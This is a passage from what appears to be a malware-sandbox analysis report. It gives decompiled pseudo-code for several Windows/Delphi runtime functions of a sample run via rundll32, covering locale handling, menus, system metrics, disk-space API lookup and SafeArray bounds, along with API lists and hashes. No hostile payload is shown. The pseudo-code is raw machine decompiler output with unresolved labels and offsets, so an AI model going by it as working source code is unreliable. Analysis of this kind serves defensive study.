                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00E493BA,00000000,00E4925E), ref: 00E47204
                          • CloseHandle.KERNEL32(00000000,00000000,00E493BA,00000000,00E4925E), ref: 00E4720F
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                          • String ID:
                          • API String ID: 2429646606-0
                          • Opcode ID: 7c6c900e16562a8a5d0423c2e0c3b60ec70c79e931482b2e318c8f1bd5958d6a
                          • Instruction ID: afe11d81338335c896ccac625678c2117bba0e1212ea09373a8fe98db69dbe0a
                          • Opcode Fuzzy Hash: 7c6c900e16562a8a5d0423c2e0c3b60ec70c79e931482b2e318c8f1bd5958d6a
                          • Instruction Fuzzy Hash: 0EF0A5F2589200DECB10FBBAEDA9A8532E4FB04314B142924F558F31B1DA34D4CACB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E00E1B480(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _v8;
                          				char _v12;
                          				intOrPtr _v16;
                          				char _v20;
                          				char _v24;
                          				void* _t41;
                          				signed int _t45;
                          				signed int _t47;
                          				signed int _t49;
                          				signed int _t51;
                          				intOrPtr _t75;
                          				void* _t76;
                          				signed int _t77;
                          				signed int _t83;
                          				signed int _t92;
                          				intOrPtr _t111;
                          				void* _t122;
                          				void* _t124;
                          				intOrPtr _t127;
                          				void* _t128;
                          
                          				_t128 = __eflags;
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_push(0);
                          				_t122 = __edx;
                          				_t124 = __eax;
                          				_push(_t127);
                          				_push(0xe1b64a);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t127;
                          				_t92 = 1;
                          				E00E14068(__edx);
                          				E00E1B148(GetThreadLocale(), 0xe1b660, 0x1009,  &_v12);
                          				if(E00E183E8(0xe1b660, 1, _t128) + 0xfffffffd - 3 < 0) {
                          					while(1) {
                          						_t41 = E00E14328(_t124);
                          						__eflags = _t92 - _t41;
                          						if(_t92 > _t41) {
                          							break;
                          						}
                          						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
                          						asm("bt [0xe7c11c], eax");
                          						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
                          							_t45 = E00E18AC8(_t124 + _t92 - 1, 2, 0xe1b664);
                          							__eflags = _t45;
                          							if(_t45 != 0) {
                          								_t47 = E00E18AC8(_t124 + _t92 - 1, 4, 0xe1b674);
                          								__eflags = _t47;
                          								if(_t47 != 0) {
                          									_t49 = E00E18AC8(_t124 + _t92 - 1, 2, 0xe1b68c);
                          									__eflags = _t49;
                          									if(_t49 != 0) {
                          										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                          										__eflags = _t51;
                          										if(_t51 == 0) {
                          											L24:
                          											E00E14330(_t122, 0xe1b6a4);
                          											L26:
                          											_t92 = _t92 + 1;
                          											__eflags = _t92;
                          											continue;
                          										}
                          										__eflags = _t51 != 0x20;
                          										if(_t51 != 0x20) {
                          											E00E14250();
                          											E00E14330(_t122, _v24);
                          											goto L26;
                          										}
                          										goto L24;
                          									}
                          									E00E14330(_t122, 0xe1b698);
                          									_t92 = _t92 + 1;
                          									goto L26;
                          								}
                          								E00E14330(_t122, 0xe1b684);
                          								_t92 = _t92 + 3;
                          								goto L26;
                          							}
                          							E00E14330(_t122, 0xe1b670);
                          							_t92 = _t92 + 1;
                          							goto L26;
                          						}
                          						_v8 = E00E1C538(_t124, _t92);
                          						E00E14588(_t124, _v8, _t92,  &_v20);
                          						E00E14330(_t122, _v20);
                          						_t92 = _t92 + _v8;
                          					}
                          					L28:
                          					_pop(_t111);
                          					 *[fs:eax] = _t111;
                          					_push(0xe1b651);
                          					return E00E1408C( &_v24, 4);
                          				}
                          				_t75 =  *0xe7f748; // 0x9
                          				_t76 = _t75 - 4;
                          				if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                          					_t77 = 1;
                          				} else {
                          					_t77 = 0;
                          				}
                          				if(_t77 == 0) {
                          					E00E140BC(_t122, _t124);
                          				} else {
                          					while(_t92 <= E00E14328(_t124)) {
                          						_t83 =  *(_t124 + _t92 - 1) - 0x47;
                          						__eflags = _t83;
                          						if(_t83 != 0) {
                          							__eflags = _t83 != 0x20;
                          							if(_t83 != 0x20) {
                          								E00E14250();
                          								E00E14330(_t122, _v16);
                          							}
                          						}
                          						_t92 = _t92 + 1;
                          						__eflags = _t92;
                          					}
                          				}
                          			}

                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,00E1B64A,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00E1B4AF
                            • Part of subcall function 00E1B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00E1B166
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: eeee$ggg$yyyy
                          • API String ID: 4232894706-1253427255
                          • Opcode ID: b783661c17f3efc4a9918460b5ed90ed6f59bc2fe410bb7d10f0a1c3a9be9b61
                          • Instruction ID: 3ebf2d6d8050bbdeaa540802931eb279ab495dc996708dfb2497c830caed3f52
                          • Opcode Fuzzy Hash: b783661c17f3efc4a9918460b5ed90ed6f59bc2fe410bb7d10f0a1c3a9be9b61
                          • Instruction Fuzzy Hash: 4241F5B07041058BD711AB7998926FEF2E7EFA4300F643125E462F7396DB30DDC28651
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E00E354FC(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _t62;
                          				intOrPtr _t64;
                          				intOrPtr _t67;
                          				void* _t77;
                          				void* _t78;
                          				intOrPtr _t79;
                          				intOrPtr _t80;
                          
                          				_t77 = _t78;
                          				_t79 = _t78 + 0xfffffff8;
                          				_v8 = __eax;
                          				_v12 = E00E13244(1);
                          				_push(_t77);
                          				_push(0xe35583);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t79;
                          				 *((intOrPtr*)(_v12 + 8)) = __edx;
                          				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                          				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                          				_t80 = _t79 + 0xc;
                          				 *((char*)(_v12 + 0x70)) = _a8;
                          				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                          					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                          				}
                          				_t62 =  *0xe25420; // 0xe2546c
                          				 *((intOrPtr*)(_v12 + 0x6c)) = E00E13424(_a4, _t62);
                          				_pop(_t64);
                          				 *[fs:eax] = _t64;
                          				_push(0xe7f8b0);
                          				L00E16368();
                          				_push(_t77);
                          				_push(0xe355e3);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t80;
                          				E00E33F84( *((intOrPtr*)(_v8 + 0x28)));
                          				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                          				E00E33F80(_v12);
                          				_pop(_t67);
                          				 *[fs:eax] = _t67;
                          				_push(0xe355ea);
                          				_push(0xe7f8b0);
                          				L00E164A8();
                          				return 0;
                          			}

                          APIs
                          • RtlEnterCriticalSection.KERNEL32(00E7F8B0), ref: 00E3559F
                          • RtlLeaveCriticalSection.KERNEL32(00E7F8B0,00E355EA,00E7F8B0), ref: 00E355DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$EnterLeave
                          • String ID: d$lT
                          • API String ID: 3168844106-387771148
                          • Opcode ID: e87ae89e4ac2950edc42d9925dcba214ef6c17a4fdb4787d47029f49a4ec407d
                          • Instruction ID: 2acf2802e6297883a7cce75653fccd84b17e9d5c65faf29322234ebb98269cf6
                          • Opcode Fuzzy Hash: e87ae89e4ac2950edc42d9925dcba214ef6c17a4fdb4787d47029f49a4ec407d
                          • Instruction Fuzzy Hash: 8E217A75A04748AFDB05DF68D881899BBF6FB48720F5291A5E804A7361C630AE80CA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E00E50494(intOrPtr* __eax) {
                          				struct tagMENUITEMINFOA _v128;
                          				intOrPtr _v132;
                          				int _t16;
                          				intOrPtr* _t29;
                          				struct HMENU__* _t36;
                          				MENUITEMINFOA* _t37;
                          
                          				_t37 =  &_v128;
                          				_t29 = __eax;
                          				_t16 =  *0xe7e318; // 0xe7f744
                          				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                          					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                          					_t37->cbSize = 0x2c;
                          					_v132 = 0x10;
                          					_v128.hbmpUnchecked =  &(_v128.cch);
                          					_v128.dwItemData = 0x50;
                          					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                          					if(_t16 != 0) {
                          						_t16 = E00E50818(_t29);
                          						asm("sbb edx, edx");
                          						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                          							_v128.cbSize = ((E00E50818(_t29) & 0x0000007f) << 0x0000000d) + ((E00E50818(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                          							_v132 = 0x10;
                          							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                          							if(_t16 != 0) {
                          								return DrawMenuBar( *(_t29 + 0x38));
                          							}
                          						}
                          					}
                          				}
                          				return _t16;
                          			}

                          0x00e50496
                          0x00e50499
                          0x00e5049b
                          0x00e504a4
                          0x00e504bb
                          0x00e504bd
                          0x00e504c4
                          0x00e504d0
                          0x00e504d4
                          0x00e504e2
                          0x00e504e9
                          0x00e504ed
                          0x00e504ff
                          0x00e50504
                          0x00e50522
                          0x00e50526
                          0x00e50534
                          0x00e5053b
                          0x00000000
                          0x00e50541
                          0x00e5053b
                          0x00e50504
                          0x00e504e9
                          0x00e5054e

                          APIs
                          • GetMenuItemInfoA.USER32 ref: 00E504E2
                          • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00E50534
                          • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00E50541
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$InfoItem$Draw
                          • String ID: P
                          • API String ID: 3227129158-3110715001
                          • Opcode ID: 4cb676cd0c71ecf94b9c07a6ecaec5c1249b2bdcf65021176732795045153d01
                          • Instruction ID: c99a92d1a7756043ce60bfe43058570af22e0b2041636339eae225e06dbc7d5c
                          • Opcode Fuzzy Hash: 4cb676cd0c71ecf94b9c07a6ecaec5c1249b2bdcf65021176732795045153d01
                          • Instruction Fuzzy Hash: 37119E70605200AFD360DB28CD81B8B7BD5AF85365F149A68F498EB2D5E775C88CCB86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E00E370E0(intOrPtr* _a4, signed int _a8) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr* _t14;
                          				intOrPtr _t16;
                          				signed int _t17;
                          				void* _t18;
                          				void* _t19;
                          
                          				_t17 = _a8;
                          				_t14 = _a4;
                          				if( *0xe7f91e != 0) {
                          					_t19 = 0;
                          					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                          						_t19 = 0x12340042;
                          					}
                          				} else {
                          					_t16 =  *0xe7f8fc; // 0xe370e0
                          					 *0xe7f8fc = E00E36F70(2, _t14, _t16, _t17, _t18);
                          					_t19 =  *0xe7f8fc(_t14, _t17);
                          				}
                          				return _t19;
                          			}

                          0x00e370e6
                          0x00e370e9
                          0x00e370f3
                          0x00e37118
                          0x00e37121
                          0x00e37148
                          0x00e37148
                          0x00e370f5
                          0x00e370fa
                          0x00e37107
                          0x00e37114
                          0x00e37114
                          0x00e37153

                          APIs
                          • GetSystemMetrics.USER32 ref: 00E37131
                          • GetSystemMetrics.USER32 ref: 00E3713D
                            • Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: MonitorFromRect$p
                          • API String ID: 1792783759-2543796470
                          • Opcode ID: 9306fca81c2115e0328f5fc48a655986e2f1f1984f0eff1ed2abe20a0da7a9b2
                          • Instruction ID: 55b87634aa0a32f243bb7aa4cef7ec6696dc058c07661ae8b917b763c07f5a8e
                          • Opcode Fuzzy Hash: 9306fca81c2115e0328f5fc48a655986e2f1f1984f0eff1ed2abe20a0da7a9b2
                          • Instruction Fuzzy Hash: B701A272209214DFEB20CB15DC89B56BFE5D741399F15A062EA88FB202C370DDC4CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E1CECC() {
                          				_Unknown_base(*)()* _t1;
                          				struct HINSTANCE__* _t3;
                          
                          				_t1 = GetModuleHandleA("kernel32.dll");
                          				_t3 = _t1;
                          				if(_t3 != 0) {
                          					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                          					 *0xe7c140 = _t1;
                          				}
                          				if( *0xe7c140 == 0) {
                          					 *0xe7c140 = E00E18914;
                          					return E00E18914;
                          				}
                          				return _t1;
                          			}

                          0x00e1ced2
                          0x00e1ced7
                          0x00e1cedb
                          0x00e1cee3
                          0x00e1cee8
                          0x00e1cee8
                          0x00e1cef4
                          0x00e1cefb
                          0x00000000
                          0x00e1cefb
                          0x00e1cf01

                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00E1D935,00000000,00E1D948), ref: 00E1CED2
                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 00E1CEE3
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                          • API String ID: 1646373207-3712701948
                          • Opcode ID: b280fd4cc4809b65f4de2450be29f1e130a047957f40584ef5ac047e4e0fa949
                          • Instruction ID: 9c0573515a2d0772567b7a6130e22eebac92121dec0988ede6e75e9807831ee8
                          • Opcode Fuzzy Hash: b280fd4cc4809b65f4de2450be29f1e130a047957f40584ef5ac047e4e0fa949
                          • Instruction Fuzzy Hash: 43D09E707853115FDB10DBAA58816EA26EAA748758B603539E004F6152D76049D68661
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E00E1EDAC(intOrPtr* __eax) {
                          				char _v260;
                          				char _v768;
                          				char _v772;
                          				intOrPtr* _v776;
                          				signed short* _v780;
                          				char _v784;
                          				signed int _v788;
                          				char _v792;
                          				intOrPtr* _v796;
                          				signed char _t43;
                          				intOrPtr* _t60;
                          				void* _t79;
                          				void* _t81;
                          				void* _t84;
                          				void* _t85;
                          				intOrPtr* _t92;
                          				void* _t96;
                          				char* _t97;
                          				void* _t98;
                          
                          				_v776 = __eax;
                          				if(( *(_v776 + 1) & 0x00000020) == 0) {
                          					E00E1EBF4(0x80070057);
                          				}
                          				_t43 =  *_v776;
                          				if((_t43 & 0x00000fff) == 0xc) {
                          					if((_t43 & 0x00000040) == 0) {
                          						_v780 =  *((intOrPtr*)(_v776 + 8));
                          					} else {
                          						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
                          					}
                          					_v788 =  *_v780 & 0x0000ffff;
                          					_t79 = _v788 - 1;
                          					if(_t79 >= 0) {
                          						_t85 = _t79 + 1;
                          						_t96 = 0;
                          						_t97 =  &_v772;
                          						do {
                          							_v796 = _t97;
                          							_push(_v796 + 4);
                          							_t22 = _t96 + 1; // 0x1
                          							_push(_v780);
                          							L00E1DE04();
                          							E00E1EBF4(_v780);
                          							_push( &_v784);
                          							_t25 = _t96 + 1; // 0x1
                          							_push(_v780);
                          							L00E1DE0C();
                          							E00E1EBF4(_v780);
                          							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
                          							_t96 = _t96 + 1;
                          							_t97 = _t97 + 8;
                          							_t85 = _t85 - 1;
                          						} while (_t85 != 0);
                          					}
                          					_t81 = _v788 - 1;
                          					if(_t81 >= 0) {
                          						_t84 = _t81 + 1;
                          						_t60 =  &_v768;
                          						_t92 =  &_v260;
                          						do {
                          							 *_t92 =  *_t60;
                          							_t92 = _t92 + 4;
                          							_t60 = _t60 + 8;
                          							_t84 = _t84 - 1;
                          						} while (_t84 != 0);
                          						do {
                          							goto L12;
                          						} while (E00E1ED50(_t83, _t98) != 0);
                          						goto L15;
                          					}
                          					L12:
                          					_t83 = _v788 - 1;
                          					if(E00E1ED20(_v788 - 1, _t98) != 0) {
                          						_push( &_v792);
                          						_push( &_v260);
                          						_push(_v780);
                          						L00E1DE14();
                          						E00E1EBF4(_v780);
                          						E00E1EFA4(_v792);
                          					}
                          				}
                          				L15:
                          				_push(_v776);
                          				L00E1D9A0();
                          				return E00E1EBF4(_v776);
                          			}

                          0x00e1edb8
                          0x00e1edc8
                          0x00e1edcf
                          0x00e1edcf
                          0x00e1edda
                          0x00e1ede8
                          0x00e1edf7
                          0x00e1ee15
                          0x00e1edf9
                          0x00e1ee04
                          0x00e1ee04
                          0x00e1ee24
                          0x00e1ee30
                          0x00e1ee33
                          0x00e1ee35
                          0x00e1ee36
                          0x00e1ee38
                          0x00e1ee3e
                          0x00e1ee40
                          0x00e1ee4f
                          0x00e1ee50
                          0x00e1ee5a
                          0x00e1ee5b
                          0x00e1ee60
                          0x00e1ee6b
                          0x00e1ee6c
                          0x00e1ee76
                          0x00e1ee77
                          0x00e1ee7c
                          0x00e1ee97
                          0x00e1ee99
                          0x00e1ee9a
                          0x00e1ee9d
                          0x00e1ee9d
                          0x00e1ee3e
                          0x00e1eea6
                          0x00e1eea9
                          0x00e1eeab
                          0x00e1eeac
                          0x00e1eeb2
                          0x00e1eeb8
                          0x00e1eeba
                          0x00e1eebc
                          0x00e1eebf
                          0x00e1eec2
                          0x00e1eec2
                          0x00e1eec5
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00e1eec5
                          0x00e1eec5
                          0x00e1eecc
                          0x00e1eed7
                          0x00e1eedf
                          0x00e1eee6
                          0x00e1eeed
                          0x00e1eeee
                          0x00e1eef3
                          0x00e1eefe
                          0x00e1eefe
                          0x00e1ef0c
                          0x00e1ef10
                          0x00e1ef16
                          0x00e1ef17
                          0x00e1ef27

                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00E1EE5B
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00E1EE77
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00E1EEEE
                          • VariantClear.OLEAUT32(?), ref: 00E1EF17
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: ArraySafe$Bound$ClearIndexVariant
                          • String ID:
                          • API String ID: 920484758-0
                          • Opcode ID: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
                          • Instruction ID: 59da2d95980800fa3231fd3e8305e8cd1e7a8b2290ecc31e96df7e7ba6836e3d
                          • Opcode Fuzzy Hash: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
                          • Instruction Fuzzy Hash: D241E375A052299FCB62DB58CC91AC9B3FCAB48304F0051E5FA49B7312DA34AFC58F61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E1C8F0() {
                          				char _v152;
                          				short _v410;
                          				signed short _t14;
                          				signed int _t16;
                          				int _t18;
                          				void* _t20;
                          				void* _t23;
                          				int _t24;
                          				int _t26;
                          				signed int _t30;
                          				signed int _t31;
                          				signed int _t32;
                          				signed int _t37;
                          				int* _t39;
                          				short* _t41;
                          				void* _t49;
                          
                          				 *0xe7f744 = 0x409;
                          				 *0xe7f748 = 9;
                          				 *0xe7f74c = 1;
                          				_t14 = GetThreadLocale();
                          				if(_t14 != 0) {
                          					 *0xe7f744 = _t14;
                          				}
                          				if(_t14 != 0) {
                          					 *0xe7f748 = _t14 & 0x3ff;
                          					 *0xe7f74c = (_t14 & 0x0000ffff) >> 0xa;
                          				}
                          				memcpy(0xe7c11c, 0xe1ca44, 8 << 2);
                          				if( *0xe7c0d4 != 2) {
                          					_t16 = GetSystemMetrics(0x4a);
                          					__eflags = _t16;
                          					 *0xe7f751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
                          					_t18 = GetSystemMetrics(0x2a);
                          					__eflags = _t18;
                          					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                          					 *0xe7f750 = _t31;
                          					__eflags = _t31;
                          					if(__eflags != 0) {
                          						return E00E1C878(__eflags, _t49);
                          					}
                          				} else {
                          					_t20 = E00E1C8D8();
                          					if(_t20 != 0) {
                          						 *0xe7f751 = 0;
                          						 *0xe7f750 = 0;
                          						return _t20;
                          					}
                          					E00E1C878(__eflags, _t49);
                          					_t37 = 0x20;
                          					_t23 = E00E12DA4(0xe7c11c, 0x20, 0xe1ca44);
                          					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                          					 *0xe7f750 = _t32;
                          					__eflags = _t32;
                          					if(_t32 != 0) {
                          						 *0xe7f751 = 0;
                          						return _t23;
                          					}
                          					_t24 = 0x80;
                          					_t39 =  &_v152;
                          					do {
                          						 *_t39 = _t24;
                          						_t24 = _t24 + 1;
                          						_t39 =  &(_t39[0]);
                          						__eflags = _t24 - 0x100;
                          					} while (_t24 != 0x100);
                          					_t26 =  *0xe7f744; // 0x409
                          					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                          					_t18 = 0x80;
                          					_t41 =  &_v410;
                          					while(1) {
                          						__eflags =  *_t41 - 2;
                          						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                          						 *0xe7f751 = _t37;
                          						__eflags = _t37;
                          						if(_t37 != 0) {
                          							goto L17;
                          						}
                          						_t41 = _t41 + 2;
                          						_t18 = _t18 - 1;
                          						__eflags = _t18;
                          						if(_t18 != 0) {
                          							continue;
                          						} else {
                          							return _t18;
                          						}
                          						L18:
                          					}
                          				}
                          				L17:
                          				return _t18;
                          				goto L18;
                          			}

                          0x00e1c8fc
                          0x00e1c906
                          0x00e1c910
                          0x00e1c91a
                          0x00e1c921
                          0x00e1c923
                          0x00e1c923
                          0x00e1c92b
                          0x00e1c937
                          0x00e1c943
                          0x00e1c943
                          0x00e1c957
                          0x00e1c960
                          0x00e1ca0f
                          0x00e1ca14
                          0x00e1ca19
                          0x00e1ca20
                          0x00e1ca25
                          0x00e1ca27
                          0x00e1ca2a
                          0x00e1ca30
                          0x00e1ca32
                          0x00000000
                          0x00e1ca3a
                          0x00e1c966
                          0x00e1c966
                          0x00e1c96d
                          0x00e1c96f
                          0x00e1c976
                          0x00000000
                          0x00e1c976
                          0x00e1c983
                          0x00e1c993
                          0x00e1c995
                          0x00e1c99a
                          0x00e1c99d
                          0x00e1c9a3
                          0x00e1c9a5
                          0x00e1c9a7
                          0x00000000
                          0x00e1c9a7
                          0x00e1c9b3
                          0x00e1c9b8
                          0x00e1c9be
                          0x00e1c9be
                          0x00e1c9c0
                          0x00e1c9c1
                          0x00e1c9c2
                          0x00e1c9c2
                          0x00e1c9de
                          0x00e1c9e4
                          0x00e1c9e9
                          0x00e1c9ee
                          0x00e1c9f4
                          0x00e1c9f4
                          0x00e1c9f8
                          0x00e1c9fb
                          0x00e1ca01
                          0x00e1ca03
                          0x00000000
                          0x00000000
                          0x00e1ca05
                          0x00e1ca08
                          0x00e1ca08
                          0x00e1ca09
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00e1ca09
                          0x00e1c9f4
                          0x00e1ca41
                          0x00e1ca41
                          0x00000000

                          APIs
                          • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 00E1C9E4
                          • GetThreadLocale.KERNEL32 ref: 00E1C91A
                            • Part of subcall function 00E1C878: GetCPInfo.KERNEL32(00000000,?), ref: 00E1C891
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocaleStringThreadType
                          • String ID:
                          • API String ID: 1505017576-0
                          • Opcode ID: ac8e5751133805fb27f1fc9376d07b54a3eee2d485c0ed95e275b5f3427e7ea8
                          • Instruction ID: 1d9255b0c4c5b9458a2e8411a66018c4e82d29b924b89f7de2d6f055dc1137e4
                          • Opcode Fuzzy Hash: ac8e5751133805fb27f1fc9376d07b54a3eee2d485c0ed95e275b5f3427e7ea8
                          • Instruction Fuzzy Hash: 953189315D43888ED710C726AC027E537D8EB81306F646076E88CFB292EA7488CED361
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E00E33E94(intOrPtr __eax, void* __edx) {
                          				intOrPtr _v8;
                          				void* __ebx;
                          				void* __ecx;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr _t33;
                          				intOrPtr _t59;
                          				struct HDC__* _t69;
                          				void* _t70;
                          				intOrPtr _t79;
                          				void* _t84;
                          				struct HPALETTE__* _t85;
                          				intOrPtr _t87;
                          				intOrPtr _t89;
                          
                          				_t87 = _t89;
                          				_push(_t70);
                          				_v8 = __eax;
                          				_t33 = _v8;
                          				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
